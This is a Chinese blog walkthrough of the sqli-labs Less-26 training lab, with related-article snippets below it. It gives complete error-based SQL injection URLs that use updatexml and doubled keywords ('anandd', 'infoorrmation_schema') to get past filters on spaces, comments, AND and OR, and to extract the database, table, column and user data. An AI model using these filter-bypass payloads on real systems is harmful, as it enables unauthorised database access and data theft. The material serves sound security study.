SQL注入分析-less-26

最新推荐文章于 2022-11-20 11:22:51 发布
最新推荐文章于 2022-11-20 11:22:51 发布
阅读量1.2k 收藏 1
点赞数 3
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33505576/article/details/113819300
版权

SQL注入分析-less-26

近期在学习SQL注入的知识,在此呢,写篇博客记录一下手工注入的过程,中间走的弯路呢就不多提了,主要把自己成功注入的过程和结果在此做一个记录,不喜勿喷哈!

1、按照提示,在地址栏输入参数

在这里插入图片描述

http://192.168.88.129/sqli-labs-master/Less-26/?id=1

结果如下,正常回显:
在这里插入图片描述
使用单引号看看页面会报什么信息:
在这里插入图片描述

http://192.168.88.129/sqli-labs-master/Less-26/?id=1’

从这里判断,这是一个字符型的注入,接下来我们来构造代码来对SQL语句进行闭合。

2、这一关考察的内容是如何绕过空格、*、- -、and、or、/、#等,所以我们在构造代码时要注意绕过以上内容。

http://192.168.88.129/sqli-labs-master/Less-26/?id=1’anandd’1’='1

这里,我们用anandd来吃掉字符串中的and字符,成功闭合查询语句:

在这里插入图片描述
闭合以后呢,我们要逐步获取库名、表名、列名和对应字段的数据,这里用SQLMAP跑了一下,没跑出来,或者说没法完整的获取我们需要的数据,所以只能手工去构造代码了。还是这句话,走的弯路就不体现了,这里直接放我注入的过程记录和结果。

3、首先,构造代码来获取库名,我所使用的方法是通过updatexml的方式,通过报错信息来获取库名,这里我在HackBar这个插件上来演示。

http://192.168.88.129/sqli-labs-master/Less-26/?id=1’anandd(updatexml(1,concat(0x7e,database(),0x7e,1),1))anandd’1’='1

在这里插入图片描述
成功在报错信息中返回库名security。

4、接下来,构造代码获取表名。

http://192.168.88.129/sqli-labs-master/Less-26/?id=1’anandd(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=‘security’))
,0x7e,1),1))anandd’1’='1

在这里插入图片描述
成功在报错信息中返回表名,这里我们需要的users这个表中的数据。

5、然后,构造代码获取列名。

http://192.168.88.129/sqli-labs-master/Less-26/?id=1’anandd(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema=‘security’)anandd(table_name=‘users’))
,0x7e,1),1))anandd’1’='1

在这里插入图片描述

成功在报错信息中返回列名。

6、最后,构造代码获取对应列的数据。

http://192.168.88.129/sqli-labs-master/Less-26/?id=1’anandd(updatexml(1,concat(0x7e,(select(group_concat(id,username))from(security.users))
,0x7e,1),1))anandd’1’='1

在这里插入图片描述
这里成功获取到了数据。

复古追月
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
Less-26
老司机开代码的博客
08-04 611
文章目录1. 题目分析2. 思路分析2.1 不用空格2.1.1 报错注入2.1.2 盲注2.2 使用特殊字符代替空格 1. 题目分析 这道题的坑算是比较多的了,我们来分析一下。 通过初步测试发现这个题目过滤的东西有点多,直接看源码 function blacklist($id) { $id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive) $id= preg_replace('/and/i',"", $id);
sql注入 Less-26-31
lyy0xfff的博客
07-23 353
ContentsPreface本博文仅用于信息安全防御教学,请遵守中华人民共和国网络安全法!!Less-26Less-26aLess-27Less-27aLess-28Less-28aLess-29Less-30 Preface 本博文仅用于信息安全防御教学,请遵守中华人民共和国网络安全法!! Less-26 0x00 由题干我们知道,它对我们的空格和一些内容进行了过滤,经过我尝试,我发现,它过滤了我们的 and 、or 、 # 、– 因为空格无法进行双写,所以我们必须要想办法绕过空格过滤 首先我们根据题目
【sqli-labs】 less26 GET- Error based -All you SPACES and COMMENTS belong to us(GET型基于错误的去除了空格和注释的注入)...
ajxi63204的博客
01-27 267
看了下源码 所有的注释形式和反斜线,and,or都被了过滤掉了 单引号没有过滤 空格也被过滤了 http://localhost/sqli-labs-master/Less-26/?id=1' http://localhost/sqli-labs-master/Less-26/?id=1' ' 看了网上的一些方法都是使用了%a0替换掉了空格 ...
sqli-less-26-less26a
沐目的博客
04-18 1019
less-26 单引号 GET型 这关就有点过滤的意思了,过滤了上一关的东西,并且把空格和%23给过滤了。如果是ubuntu的话,可以用/**/,%0a等绕过,方便一些。但我的是windows,所以就只能用()了。让后使用||来代替and,用‘1来闭合。 数据库: -1’ || updatexml(1,concat(0x7e,(database()),0x7e),1)||'1 表: 1’|...
SQL注入分析-less-26a
qq_33505576的博客
02-16 341
SQL注入分析-less-26a 1、还是按照提示,在地址栏输入参数。 http://192.168.88.129/sqli-labs-master/Less-26a/?id=1 正常回显,结果如下: 2、SQL注入的一般做法,还是输入单引号试试。 http://192.168.88.129/sqli-labs-master/Less-26a/?id=1%27 这里没有返回结果,也没有报错信息,有两种可能性,一种可能性是查询条件错误;另一种可能性是单引号导致SQL语句没有正常闭合,因为这关利用的
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
sql注入实例--安全等级
12-26
使用WebGoat,根据提示信息 ,完成包括Injection Flaw大类下的String SQL注入,Numeric SQL注入,Log Spoofing,XPATH Injection等安全弱点的攻击测试。
SQL注入工具-御剑
06-07
SQL注入工具-御剑SQL注入工具-御剑SQL注入工具-御剑SQL注入工具-御剑SQL注入工具-御剑SQL注入工具-御剑
详解SQL注入--安全(二)
09-09
主要介绍了SQL注入安全,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
sqli-labs-less-26 %a0绕过空格,报错注入
yzcn
12-03 1074
Less-26 该关卡提示空格和注释被转义,我们测试一下: http://127.0.0.1/sqli-labs-master/Less-26/?id=1 正常显示,有回显 http://127.0.0.1/sqli-labs-master/Less-26/?id=1’ 报错 http://127.0.0.1/sqli-labs-master/Less-26/?id=1’ --+ 依旧报错,并且提示提示信息为: 我们添加的注释不见了,应该是注释被转义成了空字符,我们换成;%00测试一下: http:
Sqli-labs之Less-26和Less-26a
→_→
04-22 911
Less-26 GET-基于错误-您所有的空格和注释都属于我们 待续
SQLMAP脚本-sql-labs-Less-26-27a
m0_69844818的博客
09-19 1348
sqlmap脚本跑sqli-labs
SQLi LABS Less-26 联合注入+报错注入+布尔盲注+时间盲注
热门推荐
wangyuxiang946的博客
08-15 1万+
SQLi 第二十六关,SQLi-LABS Less-26,SQLi-LABS Less 26,SQLiLABS Less26,SQLi Less 26
SQLi-LABS Less-26&&Less-26a
m0_64898960的博客
04-27 2159
Less-26题目 测试出需要“ ’ ”进行闭合 经过一番尝试,发现or和and继续坐在ban位上,然后空格和一些符号如“+”也坐上了ban位… 可以利用报错函数,便可以不用理会空格的威胁… 查表 Less-26a Less-26a需要使用“ ') ”进行闭合 继续尝试报错注入,发现报错注入已经没有我们想要的东西回显了… 只好根据题目,进行bool盲注即可 Less-26a总结 判断是否存在小括号 一开始怎么尝试都没有答案出来,后来百度原来还有个小括号,然后学习了一下如何判断是否还有小括号…真是裂
sqli-labs:less-26(过滤了空格和注释)
羽的博客
09-13 188
图片提示过滤了空格和注释 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="tex...
sqlilabs less-26~26a
TA不懒,但还没有添加简介
07-18 407
sqlilabs less-26~26a
sqli-labs/Less-26
m0_71299382的博客
11-20 1282
sqli-labs第二十六关
Sqlilabs Less-26-26a Trick with spaces and comments
baynk的博客
03-31 464
Sqlilabs Less-26 Trick with spaces and comments with single quote 手工注入 加quote报错,然后注释没效果,给出的提示看起来似乎是被过滤掉了,用之前手法闭合。然后发现and好像也被过滤了,继续双写试试,但是结果好像空格也被过滤了。。。用了各种编码都不行后,查了资料发现用%a0或者%0b替代(%a0好像是不间断空格,会在html显示...
sql注入less23
最新发布
03-16
在less23中,它是一个用于演示SQL注入的示例网站。在该示例中,存在一个漏洞,攻击者可以通过在输入字段中插入恶意的SQL代码来绕过应用程序的验证和过滤机制,从而执行未经授权的数据库操作。 为了防止SQL注入攻击...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值